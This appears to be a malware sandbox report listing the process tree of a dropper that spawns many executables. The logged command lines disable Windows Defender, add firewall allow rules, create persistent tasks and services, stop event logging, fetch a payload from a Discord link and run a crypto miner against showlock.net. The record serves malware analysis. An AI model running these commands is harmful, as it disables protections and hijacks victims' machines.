- Suspicious use of WriteProcessMemory
PID:4756

C:\Users\Admin\Documents\SimpleAdobe\K3WDl2xWvNNnkfn4nYdQExzq.exe
C:\Users\Admin\Documents\SimpleAdobe\K3WDl2xWvNNnkfn4nYdQExzq.exe
2⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
PID:2668

C:\Users\Admin\Documents\SimpleAdobe\s4AaUwLl6DEajYQi5WVeMPx0.exe
C:\Users\Admin\Documents\SimpleAdobe\s4AaUwLl6DEajYQi5WVeMPx0.exe
2⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:3520

C:\Users\Admin\Documents\SimpleAdobe\gNaZnn5CLFQicjVhsTk8gKef.exe
C:\Users\Admin\Documents\SimpleAdobe\gNaZnn5CLFQicjVhsTk8gKef.exe
2⤵
- Executes dropped EXE
PID:2104

C:\Users\Admin\AppData\Local\Temp\7zS94F8.tmp\Install.exe
.\Install.exe /IExpbdidepGR "525403" /S
3⤵
- Checks BIOS information in registry
- Checks computer location settings
- Executes dropped EXE
- Enumerates system info in registry
PID:3360

C:\Windows\SysWOW64\forfiles.exe
"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m where.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True"
4⤵
PID:4696

C:\Windows\SysWOW64\cmd.exe
/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
5⤵
PID:3640

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
6⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:468

C:\Windows\SysWOW64\Wbem\WMIC.exe
"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
7⤵
- Suspicious use of AdjustPrivilegeToken
PID:556

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "bXvtwaJkKQEzfXjvnG" /SC once /ST 18:50:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\IvFVVHNigIyhAiWaa\EDHrMUSPJvyJNvL\MczRWBv.exe\" Mv /aqsite_idVVm 525403 /S" /V1 /F
4⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:4720

C:\Users\Admin\Documents\SimpleAdobe\4dLTrXqtftUhIwJTRyHSSejV.exe
C:\Users\Admin\Documents\SimpleAdobe\4dLTrXqtftUhIwJTRyHSSejV.exe
2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:4884

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
3⤵
PID:4088

C:\Users\Admin\Documents\SimpleAdobe\e02CHlRDyVx8CisrSUbTQs_u.exe
C:\Users\Admin\Documents\SimpleAdobe\e02CHlRDyVx8CisrSUbTQs_u.exe
2⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
PID:4492

C:\Users\Admin\Documents\SimpleAdobe\oqnIhEuqPWFLxfGfy_cozJKr.exe
C:\Users\Admin\Documents\SimpleAdobe\oqnIhEuqPWFLxfGfy_cozJKr.exe
2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:2772

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
3⤵
PID:4024

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
3⤵
- Blocklisted process makes network request
PID:4308

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4308 -s 2120
4⤵
- Program crash
PID:3300

C:\Users\Admin\Documents\SimpleAdobe\kN3Wu8RUu2uTrcf2g49JbbJI.exe
C:\Users\Admin\Documents\SimpleAdobe\kN3Wu8RUu2uTrcf2g49JbbJI.exe
2⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetThreadContext
PID:3116

C:\Windows\Microsoft.NET\Framework\v4.0.30319\MsBuild.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MsBuild.exe
3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4304

C:\Users\Admin\Documents\SimpleAdobe\D3wSlOtntlkjBD387yaruAqa.exe
C:\Users\Admin\Documents\SimpleAdobe\D3wSlOtntlkjBD387yaruAqa.exe
2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:2268

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
3⤵
PID:2868

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2868 -s 2100
4⤵
- Program crash
PID:2880

C:\Users\Admin\Documents\SimpleAdobe\QcMIl6J7oMLzdIxc7BHVgaQ9.exe
C:\Users\Admin\Documents\SimpleAdobe\QcMIl6J7oMLzdIxc7BHVgaQ9.exe
2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:4744

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
3⤵
- Modifies system certificate store
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2784

C:\Users\Admin\Documents\SimpleAdobe\kwI5msI0GXCECMxCfATKQ50A.exe
C:\Users\Admin\Documents\SimpleAdobe\kwI5msI0GXCECMxCfATKQ50A.exe
2⤵
- Executes dropped EXE
- Loads dropped DLL
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
PID:4320

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4320 -s 2180
3⤵
- Program crash
PID:4252

C:\Users\Admin\Documents\SimpleAdobe\P1i57rTqyYvK8Wz1_NY_lX0m.exe
C:\Users\Admin\Documents\SimpleAdobe\P1i57rTqyYvK8Wz1_NY_lX0m.exe
2⤵
- Checks computer location settings
- Executes dropped EXE
PID:1368

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1368 -s 756
3⤵
- Program crash
PID:3628

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1368 -s 764
3⤵
- Program crash
PID:1996

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1368 -s 784
3⤵
- Program crash
PID:1832

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1368 -s 744
3⤵
- Program crash
PID:4552

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1368 -s 964
3⤵
- Program crash
PID:4928

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1368 -s 996
3⤵
- Program crash
PID:1464

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1368 -s 1332
3⤵
- Program crash
PID:1996

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c taskkill /im "P1i57rTqyYvK8Wz1_NY_lX0m.exe" /f & erase "C:\Users\Admin\Documents\SimpleAdobe\P1i57rTqyYvK8Wz1_NY_lX0m.exe" & exit
3⤵
PID:3236

C:\Windows\SysWOW64\taskkill.exe
taskkill /im "P1i57rTqyYvK8Wz1_NY_lX0m.exe" /f
4⤵
- Kills process with taskkill
PID:2388

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1368 -s 1376
3⤵
- Program crash
PID:3644

C:\Users\Admin\Documents\SimpleAdobe\GIRYqcKiZvhmj93nqNmYBOcU.exe
C:\Users\Admin\Documents\SimpleAdobe\GIRYqcKiZvhmj93nqNmYBOcU.exe
2⤵
- Modifies firewall policy service
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Checks whether UAC is enabled
- Drops file in System32 directory
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
PID:4964

C:\Users\Admin\Documents\SimpleAdobe\tuZctSq25Sx46OCwloIdBXYG.exe
C:\Users\Admin\Documents\SimpleAdobe\tuZctSq25Sx46OCwloIdBXYG.exe
2⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:3488

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
3⤵
- Suspicious behavior: EnumeratesProcesses
PID:1684

C:\Users\Admin\Documents\SimpleAdobe\tuZctSq25Sx46OCwloIdBXYG.exe
"C:\Users\Admin\Documents\SimpleAdobe\tuZctSq25Sx46OCwloIdBXYG.exe"
3⤵
- Executes dropped EXE
- Adds Run key to start application
- Checks for VirtualBox DLLs, possible anti-VM trick
- Drops file in Windows directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
PID:580

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
4⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
PID:4852

C:\Windows\system32\cmd.exe
C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
4⤵
PID:1724

C:\Windows\system32\netsh.exe
netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
5⤵
- Modifies Windows Firewall
PID:3988

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
4⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:4736

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
4⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:2952

C:\Windows\rss\csrss.exe
C:\Windows\rss\csrss.exe
4⤵
- Executes dropped EXE
- Adds Run key to start application
- Manipulates WinMonFS driver.
- Drops file in Windows directory
PID:1496

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
5⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:4352

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
6⤵
PID:4852

C:\Windows\SYSTEM32\schtasks.exe
schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
5⤵
- Creates scheduled task(s)
PID:2416

C:\Windows\SYSTEM32\schtasks.exe
schtasks /delete /tn ScheduledUpdate /f
5⤵
PID:3292

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
5⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:1948

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
5⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:464

C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe
C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll
5⤵
- Executes dropped EXE
PID:5076

C:\Windows\SYSTEM32\schtasks.exe
schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
5⤵
- Creates scheduled task(s)
PID:1592

C:\Windows\windefender.exe
"C:\Windows\windefender.exe"
5⤵
- Executes dropped EXE
PID:1492

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
6⤵
PID:2268

C:\Windows\SysWOW64\cmd.exe
cmd.exe /C sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)
6⤵
PID:3636

C:\Windows\SysWOW64\sc.exe
sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)
7⤵
- Launches sc.exe
PID:2424

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
5⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:4792

C:\Users\Admin\AppData\Local\Temp\csrss\dcb505dc2b9d8aac05f4ca0727f5eadb.exe
C:\Users\Admin\AppData\Local\Temp\csrss\dcb505dc2b9d8aac05f4ca0727f5eadb.exe -xor=al2xoqueel0She4t -m=https://cdn.discordapp.com/attachments/1225871855328559147/1225878907014615161/kVYazCOZSwqudV?ex=6622bbb3&is=661046b3&hm=c80160577fcc82f0e337c537bdd214d60583ed75bb187a016d90f94471fc09b0& -pool tls://showlock.net:40001 -pool tls://showlock.net:443 -pool tcp://showlock.net:80
5⤵
- Executes dropped EXE
PID:1164

C:\Users\Admin\AppData\Local\Temp\csrss\wup\xarch\wup.exe
C:\Users\Admin\AppData\Local\Temp\csrss\wup\xarch\wup.exe -o showlock.net:40001 --rig-id 302ba536-1ae5-4d2c-9640-436ebe72234f --tls --nicehash -o showlock.net:443 --rig-id 302ba536-1ae5-4d2c-9640-436ebe72234f --tls --nicehash -o showlock.net:80 --rig-id 302ba536-1ae5-4d2c-9640-436ebe72234f --nicehash --http-port 3433 --http-access-token 302ba536-1ae5-4d2c-9640-436ebe72234f --randomx-wrmsr=-1
6⤵
- Executes dropped EXE
- Suspicious use of FindShellTrayWindow
PID:4944

C:\Windows\rss\csrss.exe
C:\Windows\rss\csrss.exe -hide 4944
6⤵
- Executes dropped EXE
- Manipulates WinMon driver.
PID:1076

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
7⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:4312

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
5⤵
- Drops file in System32 directory
PID:4352

C:\Users\Admin\AppData\Local\Temp\csrss\713674d5e968cbe2102394be0b2bae6f.exe
C:\Users\Admin\AppData\Local\Temp\csrss\713674d5e968cbe2102394be0b2bae6f.exe
5⤵
- Executes dropped EXE
PID:5020

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
5⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:4200

C:\Users\Admin\AppData\Local\Temp\csrss\1bf850b4d9587c1017a75a47680584c4.exe
C:\Users\Admin\AppData\Local\Temp\csrss\1bf850b4d9587c1017a75a47680584c4.exe
5⤵
- Executes dropped EXE
PID:5032

C:\Windows\SYSTEM32\schtasks.exe
schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
5⤵
- Creates scheduled task(s)
PID:1956

C:\Users\Admin\Documents\SimpleAdobe\9YVd8Opjg5kP29QMElKldZkn.exe
C:\Users\Admin\Documents\SimpleAdobe\9YVd8Opjg5kP29QMElKldZkn.exe
2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:884

C:\Users\Admin\AppData\Local\Temp\is-OR2A4.tmp\is-VK0NS.tmp
"C:\Users\Admin\AppData\Local\Temp\is-OR2A4.tmp\is-VK0NS.tmp" /SL4 $601F0 "C:\Users\Admin\Documents\SimpleAdobe\9YVd8Opjg5kP29QMElKldZkn.exe" 4119408 52224
3⤵
- Executes dropped EXE
- Loads dropped DLL
PID:4784

C:\Users\Admin\AppData\Local\Three Kingsoft Video\threekingsoftvideo.exe
"C:\Users\Admin\AppData\Local\Three Kingsoft Video\threekingsoftvideo.exe" -i
4⤵
- Executes dropped EXE
PID:3964

C:\Users\Admin\AppData\Local\Three Kingsoft Video\threekingsoftvideo.exe
"C:\Users\Admin\AppData\Local\Three Kingsoft Video\threekingsoftvideo.exe" -s
4⤵
- Executes dropped EXE
PID:3792

C:\Users\Admin\Documents\SimpleAdobe\NYulW0N4e1hPawIOp4plsa35.exe
C:\Users\Admin\Documents\SimpleAdobe\NYulW0N4e1hPawIOp4plsa35.exe
2⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:4648

C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
3⤵
- Suspicious use of AdjustPrivilegeToken
PID:3516

C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
3⤵
- Suspicious use of AdjustPrivilegeToken
PID:1748

C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
3⤵
- Suspicious use of AdjustPrivilegeToken
PID:4588

C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
3⤵
- Suspicious use of AdjustPrivilegeToken
PID:3744

C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe delete "OBGPQMHF"
3⤵
- Launches sc.exe
PID:4200

C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe create "OBGPQMHF" binpath= "C:\ProgramData\ndfbaljqaqzm\dckuybanmlgp.exe" start= "auto"
3⤵
- Launches sc.exe
PID:4480

C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop eventlog
3⤵
- Launches sc.exe
PID:3524

C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe start "OBGPQMHF"
3⤵
- Launches sc.exe
PID:4024

C:\Users\Admin\Documents\SimpleAdobe\f5VHEXNHF974Dhcz8BdyX288.exe
C:\Users\Admin\Documents\SimpleAdobe\f5VHEXNHF974Dhcz8BdyX288.exe
2⤵
- Executes dropped EXE
PID:880

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
3⤵
PID:1016

C:\Users\Admin\Documents\SimpleAdobe\f5VHEXNHF974Dhcz8BdyX288.exe
"C:\Users\Admin\Documents\SimpleAdobe\f5VHEXNHF974Dhcz8BdyX288.exe"
3⤵
- Executes dropped EXE
- Checks for VirtualBox DLLs, possible anti-VM trick
PID:4160

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
4⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:2908

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc
1⤵
PID:4808

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum
1⤵
PID:3408

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 436 -p 1368 -ip 1368
1⤵
PID:1584

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc
1⤵
PID:1876

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 504 -p 1368 -ip 1368
1⤵
PID:2556

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 472 -p 1368 -ip 1368
1⤵
PID:3236

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 184 -p 2868 -ip 2868
1⤵
PID:464

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 556 -p 1368 -ip 1368
1⤵
PID:1840

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 556 -p 1368 -ip 1368
1⤵
PID:3980

C:\ProgramData\ndfbaljqaqzm\dckuybanmlgp.exe
C:\ProgramData\ndfbaljqaqzm\dckuybanmlgp.exe
1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
PID:3548

C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
2⤵
PID:1980

C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
2⤵
- Suspicious use of AdjustPrivilegeToken
PID:4480

C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
2⤵
- Suspicious use of AdjustPrivilegeToken
PID:1908

C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
2⤵
- Suspicious use of AdjustPrivilegeToken
PID:5088

C:\Windows\system32\conhost.exe
C:\Windows\system32\conhost.exe
2⤵
PID:1520

C:\Windows\system32\svchost.exe
svchost.exe
2⤵
PID:4708

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 576 -p 1368 -ip 1368
1⤵
PID:3312

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 572 -p 4320 -ip 4320
1⤵
PID:1540

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 552 -p 1368 -ip 1368
1⤵
PID:2868

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 540 -p 4308 -ip 4308
1⤵
PID:1792

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 608 -p 1368 -ip 1368
1⤵
PID:3224

C:\Users\Admin\AppData\Local\Temp\IvFVVHNigIyhAiWaa\EDHrMUSPJvyJNvL\MczRWBv.exe
C:\Users\Admin\AppData\Local\Temp\IvFVVHNigIyhAiWaa\EDHrMUSPJvyJNvL\MczRWBv.exe Mv /aqsite_idVVm 525403 /S
1⤵
- Executes dropped EXE
- Drops file in System32 directory
PID:3520

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:64;"
2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
PID:2100

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
3⤵
PID:4612

C:\Windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
4⤵
PID:640

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:64
3⤵
PID:1136

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:32
3⤵
PID:652

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:64
3⤵
PID:4004

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:32
3⤵
PID:1076

C:\Windows\SysWOW64\reg.exe
